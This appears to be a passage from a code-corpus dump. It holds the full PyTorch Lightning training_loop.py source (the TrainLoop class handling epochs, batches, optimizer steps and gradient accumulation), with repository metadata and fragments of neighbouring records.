padding_mask = flow.tensor([1] * num_tokens + [0] * num_pad, dtype=flow.long)
labels = [-1] * self.max_seq_length
loss_mask = [0] * self.max_seq_length
for idx, label in zip(masked_positions, masked_labels):
assert idx < num_tokens
labels[idx] = label
loss_mask[idx] = 1
labels = flow.tensor(labels, dtype=flow.long)
loss_mask = flow.tensor(loss_mask, dtype=flow.long)
return tokens, token_types, labels, padding_mask, loss_mask
@property
def supports_prefetch(self):
return self.dataset.supports_prefetch
def prefetch(self, indices):
self.dataset.prefetch(indices)
| true
| true
|
790dc4c70bdebe3d17d0f764a7a35b9714f96983
| 43,077
|
py
|
Python
|
pytorch_lightning/trainer/training_loop.py
|
neggert/pytorch-lightning
|
8208c330eb1a4e8cca243ee525882854dd366921
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/trainer/training_loop.py
|
neggert/pytorch-lightning
|
8208c330eb1a4e8cca243ee525882854dd366921
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/trainer/training_loop.py
|
neggert/pytorch-lightning
|
8208c330eb1a4e8cca243ee525882854dd366921
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager, suppress
from copy import copy, deepcopy
from typing import Any, Dict, List, Optional, Union
import numpy as np
import torch
from pytorch_lightning.core.optimizer import LightningOptimizer
from pytorch_lightning.core.step_result import Result
from pytorch_lightning.plugins import ParallelPlugin
from pytorch_lightning.trainer.states import TrainerState
from pytorch_lightning.trainer.supporters import TensorRunningAccum
from pytorch_lightning.utilities import _TPU_AVAILABLE, AMPType, DeviceType
from pytorch_lightning.utilities.distributed import rank_zero_info
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.finite_checks import detect_nan_parameters
from pytorch_lightning.utilities.grads import grad_norm
from pytorch_lightning.utilities.model_helpers import is_overridden
from pytorch_lightning.utilities.parsing import AttributeDict
from pytorch_lightning.utilities.signature_utils import is_param_in_hook_signature
from pytorch_lightning.utilities.warnings import WarningCache
class TrainLoop:
def __init__(self, trainer, multiple_trainloader_mode: str):
self.trainer = trainer
self.accumulated_loss = None
self.warning_cache = WarningCache()
self._teardown_already_run = False
self.running_loss = TensorRunningAccum(window_length=20)
self._curr_step_result = None
self._cur_grad_norm_dict = None
self._multiple_trainloader_mode = multiple_trainloader_mode
self._skip_backward = False
self.trainer._multiple_trainloader_mode = multiple_trainloader_mode
self._optimizer_freq_cumsum = None
def on_trainer_init(
self,
max_epochs: Optional[int],
min_epochs: Optional[int],
max_steps: Optional[int],
min_steps: Optional[int],
num_sanity_val_steps: int,
) -> None:
self.trainer.global_step = 0
self.trainer.current_epoch = 0
self.trainer.should_stop = False
self.trainer.state = TrainerState()
self.trainer.total_batch_idx = 0
self.trainer.batch_idx = 0
self.trainer.num_training_batches = 0
self.trainer.train_dataloader = None
# If neither max_epochs or max_steps is set, then use existing default of max_epochs = 1000
self.trainer.max_epochs = 1000 if (max_epochs is None and max_steps is None) else max_epochs
# If neither min_epochs or min_steps is set, then use existing default of min_epochs = 1
self.trainer.min_epochs = 1 if (min_epochs is None and min_steps is None) else min_epochs
self.trainer.max_steps = max_steps
self.trainer.min_steps = min_steps
if num_sanity_val_steps == -1:
self.trainer.num_sanity_val_steps = float("inf")
else:
self.trainer.num_sanity_val_steps = num_sanity_val_steps
@property
def num_optimizers(self):
num_optimizers = len(self.get_optimizers_iterable())
return num_optimizers
@property
def optimizer_freq_cumsum(self):
if self._optimizer_freq_cumsum is None:
self._optimizer_freq_cumsum = np.cumsum(self.trainer.optimizer_frequencies)
return self._optimizer_freq_cumsum
def should_skip_training(self):
should_by_max_steps = self.trainer.max_steps is not None and self.trainer.global_step >= self.trainer.max_steps
should_by_epoch = self.trainer.max_epochs is not None and self.trainer.current_epoch >= self.trainer.max_epochs
return should_by_max_steps or should_by_epoch or self.trainer.num_training_batches == 0
def on_train_start(self):
# hook
self.trainer.call_hook("on_train_start")
def on_train_end(self):
if self._teardown_already_run:
return
self._teardown_already_run = True
# trigger checkpoint check. need to temporarily decrease the global step to avoid saving duplicates
# when a checkpoint was saved at the last step
self.trainer.global_step -= 1
self.check_checkpoint_callback(should_update=True, is_last=True)
self.trainer.global_step += 1
# hook
self.trainer.call_hook("on_train_end")
# todo: TPU 8 cores hangs in flush with TensorBoard. Might do for all loggers.
# It might be related to xla tensors blocked when moving the cpu
# kill loggers
if self.trainer.logger is not None:
self.trainer.logger.finalize("success")
# summarize profile results
self.trainer.profiler.describe()
# give accelerators a chance to finish
self.trainer.accelerator.on_train_end()
# reset bookkeeping
self.trainer.state.stage = None
def check_checkpoint_callback(self, should_update, is_last=False):
# TODO bake this logic into the ModelCheckpoint callback
if should_update and self.trainer.checkpoint_connector.has_trained:
callbacks = self.trainer.checkpoint_callbacks
if is_last and any(cb.save_last and cb.verbose for cb in callbacks):
rank_zero_info("Saving latest checkpoint...")
model = self.trainer.lightning_module
for cb in callbacks:
cb.on_validation_end(self.trainer, model)
def on_train_epoch_start(self, epoch):
# update training progress in trainer
self.trainer.current_epoch = epoch
model = self.trainer.lightning_module
# reset train dataloader
if epoch != 0 and self.trainer.reload_dataloaders_every_epoch:
self.trainer.reset_train_dataloader(model)
# todo: specify the possible exception
with suppress(Exception):
# set seed for distributed sampler (enables shuffling for each epoch)
self.trainer.train_dataloader.sampler.set_epoch(epoch)
# changing gradient according accumulation_scheduler
self.trainer.accumulation_scheduler.on_train_epoch_start(self.trainer, self.trainer.lightning_module)
# stores accumulated grad fractions per batch
self.accumulated_loss = TensorRunningAccum(window_length=self.trainer.accumulate_grad_batches)
# hook
self.trainer.call_hook("on_epoch_start")
self.trainer.call_hook("on_train_epoch_start")
def on_train_batch_end(self, epoch_output, batch_end_outputs, batch, batch_idx, dataloader_idx):
batch_end_outputs = [opt_idx_out for opt_idx_out in batch_end_outputs if len(opt_idx_out)]
processed_batch_end_outputs = TrainLoop._prepare_outputs(batch_end_outputs, batch_mode=True)
# hook
self.trainer.call_hook('on_train_batch_end', processed_batch_end_outputs, batch, batch_idx, dataloader_idx)
self.trainer.call_hook('on_batch_end')
# figure out what to track for epoch end
self.track_epoch_end_reduce_metrics(epoch_output, batch_end_outputs)
# reset batch logger internals
self.trainer.logger_connector.on_train_batch_end()
def reset_train_val_dataloaders(self, model) -> None:
"""
Resets train and val dataloaders if none are attached to the trainer.
The val dataloader must be initialized before training loop starts, as the training loop
inspects the val dataloader to determine whether to run the evaluation loop.
"""
if self.trainer.train_dataloader is None:
self.trainer.reset_train_dataloader(model)
if self.trainer.val_dataloaders is None:
self.trainer.reset_val_dataloader(model)
def track_epoch_end_reduce_metrics(self, epoch_output, batch_end_outputs):
hook_overridden = self._should_add_batch_output_to_epoch_output()
# track the outputs to reduce at the end of the epoch
for opt_idx, opt_outputs in enumerate(batch_end_outputs):
sample_output = opt_outputs[-1]
# decide if we need to reduce at the end of the epoch automatically
auto_reduce_tng_result = isinstance(sample_output, Result) and sample_output.should_reduce_on_epoch_end
# only track when a) it needs to be autoreduced OR b) the user wants to manually reduce on epoch end
if not (hook_overridden or auto_reduce_tng_result):
continue
# with 1 step (no tbptt) don't use a sequence at epoch end
if isinstance(opt_outputs, list) and len(opt_outputs) == 1 and not isinstance(opt_outputs[0], Result):
opt_outputs = opt_outputs[0]
epoch_output[opt_idx].append(opt_outputs)
def _should_add_batch_output_to_epoch_output(self) -> bool:
# We add to the epoch outputs if
# 1. The model defines training_epoch_end OR
# 2. The model overrides on_train_epoch_end which has `outputs` in the signature
# TODO: in v1.5 this only needs to check if training_epoch_end is overridden
lightning_module = self.trainer.lightning_module
if is_overridden("training_epoch_end", model=lightning_module):
return True
if is_overridden("on_train_epoch_end", model=lightning_module):
model_hook_fx = getattr(lightning_module, "on_train_epoch_end")
if is_param_in_hook_signature(model_hook_fx, "outputs"):
return True
return False
def get_optimizers_iterable(self, batch_idx=None):
"""
Generates an iterable with (idx, optimizer) for each optimizer.
"""
if not self.trainer.optimizer_frequencies:
# call training_step once per optimizer
return list(enumerate(self.trainer.optimizers))
if batch_idx is None:
batch_idx = self.trainer.total_batch_idx
optimizers_loop_length = self.optimizer_freq_cumsum[-1]
current_place_in_loop = batch_idx % optimizers_loop_length
# find optimzier index by looking for the first {item > current_place} in the cumsum list
opt_idx = np.argmax(self.optimizer_freq_cumsum > current_place_in_loop)
return [[opt_idx, self.trainer.optimizers[opt_idx]]]
def on_after_backward(self, training_step_output, batch_idx, untouched_loss):
training_step_output.detach()
# insert after step hook
self.trainer.call_hook("on_after_backward")
# when in dev debugging track the losses
self.trainer.dev_debugger.track_train_loss_history(batch_idx, untouched_loss.detach())
def _check_training_step_output(self, training_step_output):
if isinstance(training_step_output, torch.Tensor) and not self.trainer.lightning_module.automatic_optimization:
if training_step_output.grad_fn is None:
# TODO: Find why - RuntimeError: Expected to mark a variable ready only once ...
raise MisconfigurationException("In manual optimization, `training_step` should not return a Tensor")
def training_step(self, split_batch, batch_idx, opt_idx, hiddens):
# give the PL module a result for logging
model_ref = self.trainer.lightning_module
with self.trainer.profiler.profile("model_forward"):
args = self.build_train_args(split_batch, batch_idx, opt_idx, hiddens)
# manually capture logged metrics
model_ref._current_fx_name = 'training_step'
model_ref._results = Result()
with self.trainer.profiler.profile("training_step"):
training_step_output = self.trainer.accelerator.training_step(args)
self.trainer.accelerator.post_training_step()
self.trainer.logger_connector.cache_logged_metrics()
self._check_training_step_output(training_step_output)
training_step_output = self.trainer.call_hook("training_step_end", training_step_output)
training_step_output_for_epoch_end, training_step_output = self._process_training_step_output(
training_step_output, split_batch
)
if training_step_output_for_epoch_end is None:
return
# enable empty loss when using manual opt
closure_loss = None
untouched_loss = None
if self.trainer.lightning_module.automatic_optimization:
# accumulate loss. if accumulate_grad_batches==1, no effect
closure_loss = training_step_output.minimize / self.trainer.accumulate_grad_batches
# the loss will get scaled for amp. avoid any modifications to it
untouched_loss = closure_loss.detach().clone()
# result
result = AttributeDict(
closure_loss=closure_loss,
loss=untouched_loss,
training_step_output=training_step_output,
training_step_output_for_epoch_end=training_step_output_for_epoch_end,
)
return result
def _process_training_step_output(self, training_step_output, split_batch):
training_step_output_for_epoch_end = training_step_output
# enable validation_step return None
if training_step_output_for_epoch_end is None:
return None, None
result = self.trainer.lightning_module._results
loss = None
hiddens = None
result["extra"] = {}
# handle dict return
if isinstance(training_step_output, dict):
loss = training_step_output.pop("loss", None)
hiddens = training_step_output.pop("hiddens", None)
if hiddens is not None:
hiddens = hiddens.detach()
result["extra"] = training_step_output
# handle scalar return
elif isinstance(training_step_output, torch.Tensor):
loss = training_step_output
# map to results under the hood
result.minimize = loss
self.trainer.hiddens = hiddens
# track batch for manual reduction with result
result.track_batch_size(len(split_batch))
# track metrics without grads for epoch reduction
training_step_output_for_epoch_end = copy(result)
training_step_output_for_epoch_end = training_step_output_for_epoch_end.detach()
if self.trainer.move_metrics_to_cpu:
training_step_output_for_epoch_end = training_step_output_for_epoch_end.cpu()
return training_step_output_for_epoch_end, result
@staticmethod
def _prepare_outputs(
outputs: List[List[List[Result]]],
batch_mode: bool,
) -> Union[List[List[List[Dict]]], List[List[Dict]], List[Dict], Dict]:
"""
Extract required information from batch or epoch end results.
Args:
outputs: A 3-dimensional list of ``Result`` objects with dimensions:
[optimizer outs][batch outs][tbptt steps].
batch_mode: If True, ignore the batch output dimension.
Returns:
The cleaned outputs with ``Result`` objects converted to dictionaries. All list dimensions of size one will
be collapsed.
"""
processed_outputs = []
for opt_outputs in outputs:
# handle an edge case where an optimizer output is the empty list
if len(opt_outputs) == 0:
continue
processed_batch_outputs = []
if batch_mode:
opt_outputs = [opt_outputs]
for batch_outputs in opt_outputs:
processed_tbptt_outputs = []
for tbptt_output in batch_outputs:
out = tbptt_output.extra
out['loss'] = tbptt_output.minimize
processed_tbptt_outputs.append(out)
# if there was only one tbptt step then we can collapse that dimension
if len(processed_tbptt_outputs) == 1:
processed_tbptt_outputs = processed_tbptt_outputs[0]
processed_batch_outputs.append(processed_tbptt_outputs)
# batch_outputs should be just one dict (or a list of dicts if using tbptt) per optimizer
if batch_mode:
processed_batch_outputs = processed_batch_outputs[0]
processed_outputs.append(processed_batch_outputs)
# if there is only one optimiser then we collapse that dimension
if len(processed_outputs) == 1:
processed_outputs = processed_outputs[0]
return processed_outputs
def optimizer_step(self, optimizer, opt_idx, batch_idx, train_step_and_backward_closure):
model_ref = self.trainer.lightning_module
is_lbfgs = isinstance(optimizer, torch.optim.LBFGS)
using_native_amp = self.trainer.amp_backend == AMPType.NATIVE
# native amp + lbfgs is a no go right now
if using_native_amp and is_lbfgs:
raise MisconfigurationException(
'native PyTorch amp and lbfgs are not compatible.'
' To request, please file a Github issue in PyTorch and tag @mcarilli'
)
# wraps into LightningOptimizer only for running step
optimizer = LightningOptimizer._to_lightning_optimizer(optimizer, self.trainer, opt_idx)
# model hook
model_ref.optimizer_step(
self.trainer.current_epoch,
batch_idx,
optimizer,
opt_idx,
train_step_and_backward_closure,
on_tpu=self.trainer._device_type == DeviceType.TPU and _TPU_AVAILABLE,
using_native_amp=using_native_amp,
using_lbfgs=is_lbfgs,
)
def on_before_zero_grad(self, optimizer):
self.trainer.call_hook('on_before_zero_grad', optimizer)
def optimizer_zero_grad(self, batch_idx, optimizer, opt_idx):
self.trainer.accelerator.optimizer_zero_grad(self.trainer.current_epoch, batch_idx, optimizer, opt_idx)
def track_and_norm_grad(self, optimizer):
# track gradient norms
grad_norm_dic = self._track_gradient_norm()
# clip gradients
self.trainer.accelerator.clip_gradients(
optimizer, self.trainer.gradient_clip_val, gradient_clip_algorithm=self.trainer.gradient_clip_algorithm
)
self._cur_grad_norm_dict = grad_norm_dic
def _track_gradient_norm(self):
grad_norm_dict = {}
if (self.trainer.global_step + 1) % self.trainer.log_every_n_steps == 0:
if float(self.trainer.track_grad_norm) > 0:
model = self.trainer.lightning_module
grad_norm_dict = grad_norm(model, self.trainer.track_grad_norm)
return grad_norm_dict
def _tbptt_split_batch(self, batch: Any) -> List[Any]:
splits = [batch]
truncated_bptt_enabled = self._truncated_bptt_enabled()
if truncated_bptt_enabled:
model_ref = self.trainer.lightning_module
with self.trainer.profiler.profile("tbptt_split_batch"):
splits = model_ref.tbptt_split_batch(batch, self._truncated_bptt_steps())
return splits
def run_training_epoch(self):
# modify dataloader if needed (ddp, etc...)
train_dataloader = self.trainer.accelerator.process_dataloader(self.trainer.train_dataloader)
# track epoch output
epoch_output = [[] for _ in range(self.num_optimizers)]
train_dataloader = self.trainer.data_connector.get_profiled_train_dataloader(train_dataloader)
dataloader_idx = 0
val_loop_called = False
batch_idx = None
is_last_batch = None
for batch_idx, (batch, is_last_batch) in train_dataloader:
self.trainer.batch_idx = batch_idx
self.trainer.is_last_batch = is_last_batch
# ------------------------------------
# TRAINING_STEP + TRAINING_STEP_END
# ------------------------------------
with self.trainer.profiler.profile("run_training_batch"):
batch_output = self.run_training_batch(batch, batch_idx, dataloader_idx)
# when returning -1 from train_step, we end epoch early
if batch_output.signal == -1:
break
# hook
# TODO: add outputs to batches
self.on_train_batch_end(
epoch_output,
batch_output.training_step_output_for_epoch_end,
batch,
batch_idx,
dataloader_idx,
)
# -----------------------------------------
# SAVE METRICS TO LOGGERS
# -----------------------------------------
self.trainer.logger_connector.log_train_step_metrics(batch_output)
# -----------------------------------------
# VALIDATE IF NEEDED
# -----------------------------------------
should_check_val = self._should_check_val_fx(batch_idx, is_last_batch)
if should_check_val:
self.trainer.validating = True
self.trainer.run_evaluation()
self.trainer.training = True
val_loop_called = True
# -----------------------------------------
# SAVE LOGGERS (ie: Tensorboard, etc...)
# -----------------------------------------
self.save_loggers_on_train_batch_end()
# update LR schedulers
monitor_metrics = deepcopy(self.trainer.logger_connector.callback_metrics)
self.update_train_loop_lr_schedulers(monitor_metrics=monitor_metrics)
self.trainer.checkpoint_connector.has_trained = True
# max steps reached, end training
if (
self.trainer.max_steps is not None and self.trainer.max_steps <= self.trainer.global_step + 1
and self._accumulated_batches_reached()
):
break
# end epoch early
# stop when the flag is changed or we've gone past the amount
# requested in the batches
if self.trainer.should_stop:
break
self.trainer.total_batch_idx += 1
# stop epoch if we limited the number of training batches
if self._num_training_batches_reached(is_last_batch):
break
# progress global step according to grads progress
self.increment_accumulated_grad_global_step()
if batch_idx is None:
# dataloader/iterator did not produce a batch
return
# handle epoch_output on epoch end
self.on_train_epoch_end(epoch_output)
# log epoch metrics
self.trainer.logger_connector.log_train_epoch_end_metrics(epoch_output)
should_check_val = self._should_check_val_fx(batch_idx, is_last_batch, on_epoch=True)
should_skip_eval = self.trainer.evaluation_loop.should_skip_evaluation(self.trainer.num_val_batches)
should_train_only = self.trainer.disable_validation or should_skip_eval
# update epoch level lr_schedulers if no val loop outside train loop is triggered
if (val_loop_called and not should_check_val) or should_train_only:
self.trainer.optimizer_connector.update_learning_rates(interval='epoch')
if should_train_only:
self.check_checkpoint_callback(True)
if should_check_val:
self.trainer.validating = True
self.trainer.run_evaluation(on_epoch=True)
self.trainer.training = True
# increment the global step once
# progress global step according to grads progress
self.increment_accumulated_grad_global_step()
def on_train_epoch_end(self, epoch_output: List[List[List[Result]]]) -> None:
# inform logger the batch loop has finished
self.trainer.logger_connector.on_train_epoch_end()
# prepare epoch output
processed_epoch_output = TrainLoop._prepare_outputs(epoch_output, batch_mode=False)
# get the model and call model.training_epoch_end
model = self.trainer.lightning_module
if is_overridden('training_epoch_end', model=model):
# run training_epoch_end
# refresh the result for custom logging at the epoch level
model._current_fx_name = 'training_epoch_end'
# lightningmodule hook
training_epoch_end_output = model.training_epoch_end(processed_epoch_output)
if training_epoch_end_output is not None:
raise MisconfigurationException(
'training_epoch_end expects a return of None. '
'HINT: remove the return statement in training_epoch_end'
)
# capture logging
self.trainer.logger_connector.cache_logged_metrics()
# call train epoch end hooks
self._on_train_epoch_end_hook(processed_epoch_output)
self.trainer.call_hook('on_epoch_end')
def _on_train_epoch_end_hook(self, processed_epoch_output) -> None:
# We cannot rely on Trainer.call_hook because the signatures might be different across
# lightning module and callback
# As a result, we need to inspect if the module accepts `outputs` in `on_train_epoch_end`
# This implementation is copied from Trainer.call_hook
hook_name = "on_train_epoch_end"
# set hook_name to model + reset Result obj
skip = self.trainer._reset_result_and_set_hook_fx_name(hook_name)
# always profile hooks
with self.trainer.profiler.profile(hook_name):
# first call trainer hook
if hasattr(self.trainer, hook_name):
trainer_hook = getattr(self.trainer, hook_name)
trainer_hook(processed_epoch_output)
# next call hook in lightningModule
model_ref = self.trainer.lightning_module
if is_overridden(hook_name, model_ref):
hook_fx = getattr(model_ref, hook_name)
if is_param_in_hook_signature(hook_fx, "outputs"):
self.warning_cache.warn(
"The signature of `ModelHooks.on_train_epoch_end` has changed in v1.3."
" `outputs` parameter has been deprecated."
" Support for the old signature will be removed in v1.5", DeprecationWarning
)
model_ref.on_train_epoch_end(processed_epoch_output)
else:
model_ref.on_train_epoch_end()
# if the PL module doesn't have the hook then call the accelerator
# used to auto-reduce things for the user with Results obj
elif hasattr(self.trainer.accelerator, hook_name):
accelerator_hook = getattr(self.trainer.accelerator, hook_name)
accelerator_hook()
if not skip:
self.trainer._cache_logged_metrics()
def run_training_batch(self, batch, batch_idx, dataloader_idx):
# track grad norms
grad_norm_dic = {}
# bookkeeping
self.trainer.hiddens = None
optimizers = self.prepare_optimizers()
# track all outputs across time and num of optimizers
batch_outputs = [[] for _ in range(len(optimizers))]
if batch is None:
self.warning_cache.warn("train_dataloader yielded None. If this was on purpose, ignore this warning...")
return AttributeDict(
signal=0,
grad_norm_dic=grad_norm_dic,
training_step_output_for_epoch_end=batch_outputs,
)
# hook
response = self.trainer.call_hook("on_batch_start")
if response == -1:
return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)
# hook
response = self.trainer.call_hook("on_train_batch_start", batch, batch_idx, dataloader_idx)
if response == -1:
return AttributeDict(signal=-1, grad_norm_dic=grad_norm_dic)
# lightning module hook
splits = self._tbptt_split_batch(batch)
for split_idx, split_batch in enumerate(splits):
# create an iterable for optimizers and loop over them
for opt_idx, optimizer in optimizers:
# toggle model params + set info to logger_connector
self.run_train_split_start(split_idx, split_batch, opt_idx, optimizer)
if self.should_accumulate():
# For gradient accumulation
# -------------------
# calculate loss (train step + train step end)
# -------------------
# automatic_optimization=True: perform dpp sync only when performing optimizer_step
# automatic_optimization=False: don't block synchronization here
with self.block_ddp_sync_behaviour():
self.training_step_and_backward(
split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens
)
batch_outputs = self._process_closure_result(
batch_outputs=batch_outputs,
opt_idx=opt_idx,
)
# ------------------------------
# BACKWARD PASS
# ------------------------------
# gradient update with accumulated gradients
else:
if self.trainer.lightning_module.automatic_optimization:
def train_step_and_backward_closure():
result = self.training_step_and_backward(
split_batch, batch_idx, opt_idx, optimizer, self.trainer.hiddens
)
return None if result is None else result.loss
# optimizer step
self.optimizer_step(optimizer, opt_idx, batch_idx, train_step_and_backward_closure)
else:
self._curr_step_result = self.training_step(
split_batch, batch_idx, opt_idx, self.trainer.hiddens
)
if self._curr_step_result is None:
# user decided to skip optimization
# make sure to zero grad.
continue
batch_outputs = self._process_closure_result(
batch_outputs=batch_outputs,
opt_idx=opt_idx,
)
# todo: Properly aggregate grad_norm accros opt_idx and split_idx
grad_norm_dic = self._cur_grad_norm_dict
self._cur_grad_norm_dict = None
# update running loss + reset accumulated loss
self.update_running_loss()
result = AttributeDict(
signal=0,
grad_norm_dic=grad_norm_dic,
training_step_output_for_epoch_end=batch_outputs,
)
return result
@contextmanager
def block_ddp_sync_behaviour(self, should_block_sync: bool = False):
"""
automatic_optimization = True
Blocks ddp sync gradients behaviour on backwards pass.
This is useful for skipping sync when accumulating gradients, reducing communication overhead
automatic_optimization = False
do not block ddp gradient sync when using manual optimization
as gradients are needed within the training step
Returns:
context manager with sync behaviour off
"""
if (
isinstance(self.trainer.training_type_plugin, ParallelPlugin)
and (self.trainer.lightning_module.automatic_optimization or should_block_sync)
):
with self.trainer.training_type_plugin.block_backward_sync():
yield None
else:
yield None
def _process_closure_result(self, batch_outputs: list, opt_idx: int) -> list:
opt_closure_result = self._curr_step_result
if opt_closure_result is not None:
# cache metrics
self.trainer.logger_connector.cache_training_step_metrics(opt_closure_result)
# check if loss or model weights are nan
if self.trainer.terminate_on_nan:
self._check_finite(opt_closure_result.loss)
# track all the outputs across all steps
batch_opt_idx = opt_idx if len(batch_outputs) > 1 else 0
batch_outputs[batch_opt_idx].append(opt_closure_result.training_step_output_for_epoch_end)
if self.trainer.lightning_module.automatic_optimization:
# track total loss for logging (avoid mem leaks)
self.accumulated_loss.append(opt_closure_result.loss)
self._curr_step_result = None
return batch_outputs
def training_step_and_backward(self, split_batch, batch_idx, opt_idx, optimizer, hiddens):
"""Wrap forward, zero_grad and backward in a closure so second order methods work"""
with self.trainer.profiler.profile("training_step_and_backward"):
# lightning module hook
result = self.training_step(split_batch, batch_idx, opt_idx, hiddens)
self._curr_step_result = result
if not self._skip_backward and self.trainer.lightning_module.automatic_optimization:
is_first_batch_to_accumulate = batch_idx % self.trainer.accumulate_grad_batches == 0
if is_first_batch_to_accumulate:
self.on_before_zero_grad(optimizer)
self.optimizer_zero_grad(batch_idx, optimizer, opt_idx)
# backward pass
if result is not None:
with self.trainer.profiler.profile("backward"):
self.backward(result, optimizer, opt_idx)
# hook - call this hook only
# when gradients have finished to accumulate
if not self.should_accumulate():
self.on_after_backward(result.training_step_output, batch_idx, result.loss)
# check if loss or model weights are nan
if self.trainer.terminate_on_nan:
self._check_finite(result.loss)
else:
self.warning_cache.warn(
"training_step returned None. If this was on purpose, ignore this warning..."
)
if len(self.trainer.optimizers) > 1:
# revert back to previous state
self.trainer.lightning_module.untoggle_optimizer(opt_idx)
return result
def _check_finite(self, loss: torch.Tensor) -> None:
if not torch.isfinite(loss).all():
raise ValueError(f'The loss returned in `training_step` is {loss}.')
model = self.trainer.lightning_module
detect_nan_parameters(model)
def backward(self, result, optimizer, opt_idx, *args, **kwargs):
self.trainer.dev_debugger.track_event("backward_call")
should_accumulate = self.should_accumulate()
# backward can be called manually in the training loop
if isinstance(result, torch.Tensor):
self.trainer.accelerator.backward(result, optimizer, opt_idx, should_accumulate, *args, **kwargs)
else:
result.closure_loss = self.trainer.accelerator.backward(
result.closure_loss, optimizer, opt_idx, should_accumulate, *args, **kwargs
)
if not self.should_accumulate():
# track gradients
self.track_and_norm_grad(optimizer=optimizer)
def update_train_loop_lr_schedulers(self, monitor_metrics=None):
num_accumulated_batches_reached = self._accumulated_batches_reached()
num_training_batches_reached = self._num_training_batches_reached()
if num_accumulated_batches_reached or num_training_batches_reached:
# update lr
self.trainer.optimizer_connector.update_learning_rates(
interval="step",
monitor_metrics=monitor_metrics,
opt_indices=[opt_idx for opt_idx, _ in self.get_optimizers_iterable()],
)
def increment_accumulated_grad_global_step(self):
num_accumulated_batches_reached = self._accumulated_batches_reached()
num_training_batches_reached = self._num_training_batches_reached()
# progress global step according to grads progress
if num_accumulated_batches_reached or num_training_batches_reached:
self.trainer.global_step = self.trainer.accelerator.update_global_step(
self.trainer.total_batch_idx, self.trainer.global_step
)
def _accumulated_batches_reached(self):
return (self.trainer.batch_idx + 1) % self.trainer.accumulate_grad_batches == 0
def _num_training_batches_reached(self, is_last_batch=False):
return (self.trainer.batch_idx + 1) == self.trainer.num_training_batches or is_last_batch
def should_accumulate(self):
# checks if backward or backward + optimizer step (via closure)
accumulation_done = self._accumulated_batches_reached()
is_final_batch = self._num_training_batches_reached()
return not (accumulation_done or is_final_batch)
def _should_check_val_fx(self, batch_idx: int, is_last_batch: bool, on_epoch: bool = False) -> bool:
""" Decide if we should run validation. """
if not self.trainer.enable_validation:
return False
# check if this epoch is eligible to run validation
if (self.trainer.current_epoch + 1) % self.trainer.check_val_every_n_epoch != 0:
return False
# val_check_batch is inf for iterable datasets with no length defined
# TODO: let training/eval loop handle logic around limit_*_batches and val_check_batch
is_val_check_batch = False
if isinstance(self.trainer.limit_train_batches, int) and self.trainer.val_check_batch == float('inf'):
is_val_check_batch = (batch_idx + 1) % self.trainer.limit_train_batches == 0
elif self.trainer.val_check_batch != float('inf'):
is_val_check_batch = (batch_idx + 1) % self.trainer.val_check_batch == 0
# Note: num_training_batches is also inf for iterable datasets with no length defined
epoch_end_val_check = (batch_idx + 1) % self.trainer.num_training_batches == 0
is_last_batch_for_infinite_dataset = is_last_batch and self.trainer.val_check_batch == float("inf")
if on_epoch:
return (
is_val_check_batch and epoch_end_val_check
) or self.trainer.should_stop or is_last_batch_for_infinite_dataset
else:
return is_val_check_batch and not epoch_end_val_check
def build_train_args(self, batch, batch_idx, opt_idx, hiddens):
# enable not needing to add opt_idx to training_step
args = [batch, batch_idx]
if len(self.trainer.optimizers) > 1:
if self.trainer.has_arg("training_step", "optimizer_idx"):
if not self.trainer.lightning_module.automatic_optimization:
self.warning_cache.warn(
"`training_step` hook signature has changed in v1.3."
" `optimizer_idx` argument has been removed in case of manual optimization. Support for"
" the old signature will be removed in v1.5", DeprecationWarning
)
args.append(opt_idx)
elif not self.trainer.has_arg(
"training_step", "optimizer_idx"
) and self.trainer.lightning_module.automatic_optimization:
raise ValueError(
f"Your LightningModule defines {len(self.trainer.optimizers)} optimizers but"
' `training_step` is missing the `optimizer_idx` argument.'
)
# pass hiddens if using tbptt
if self._truncated_bptt_enabled():
args.append(hiddens)
return args
def _truncated_bptt_enabled(self) -> bool:
""" Temporary tbptt utilities until this flag is fully migrated to the lightning module. """
return self._truncated_bptt_steps() > 0
def _truncated_bptt_steps(self) -> int:
lightning_module = self.trainer.lightning_module
# Give precedence to the LightningModule as the Trainer flag will be removed in v1.5
if lightning_module.truncated_bptt_steps > 0:
return lightning_module.truncated_bptt_steps
return self.trainer.truncated_bptt_steps or 0
def save_loggers_on_train_batch_end(self):
# when loggers should save to disk
should_flush_logs = self.trainer.logger_connector.should_flush_logs
if should_flush_logs and self.trainer.is_global_zero and self.trainer.logger is not None:
self.trainer.logger.save()
def prepare_optimizers(self):
# in manual optimization we loop over all optimizers at once
optimizers = self.get_optimizers_iterable()
if not self.trainer.lightning_module.automatic_optimization:
optimizers = [optimizers[0]]
return optimizers
def run_train_split_start(self, split_idx, split_batch, opt_idx, optimizer):
# set split_idx to trainer for tracking
self.trainer.split_idx = split_idx
# make sure only the gradients of the current optimizer's parameters are calculated
# in the training step to prevent dangling gradients in multiple-optimizer setup.
if self.trainer.lightning_module.automatic_optimization and len(self.trainer.optimizers) > 1:
model = self.trainer.lightning_module
model.toggle_optimizer(optimizer, opt_idx)
# use to track metrics internally
self.trainer.logger_connector.on_train_split_start(split_idx, opt_idx, split_batch)
def update_running_loss(self):
accumulated_loss = self.accumulated_loss.mean()
if accumulated_loss is not None:
# calculate running loss for display
self.running_loss.append(self.accumulated_loss.mean() * self.trainer.accumulate_grad_batches)
# reset for next set of accumulated grads
self.accumulated_loss.reset()
| 42.735119
| 119
| 0.654874
|
from contextlib import contextmanager, suppress
from copy import copy, deepcopy
from typing import Any, Dict, List, Optional, Union
import numpy as np
import torch
from pytorch_lightning.core.optimizer import LightningOptimizer
from pytorch_lightning.core.step_result import Result
from pytorch_lightning.plugins import ParallelPlugin
from pytorch_lightning.trainer.states import TrainerState
from pytorch_lightning.trainer.supporters import TensorRunningAccum
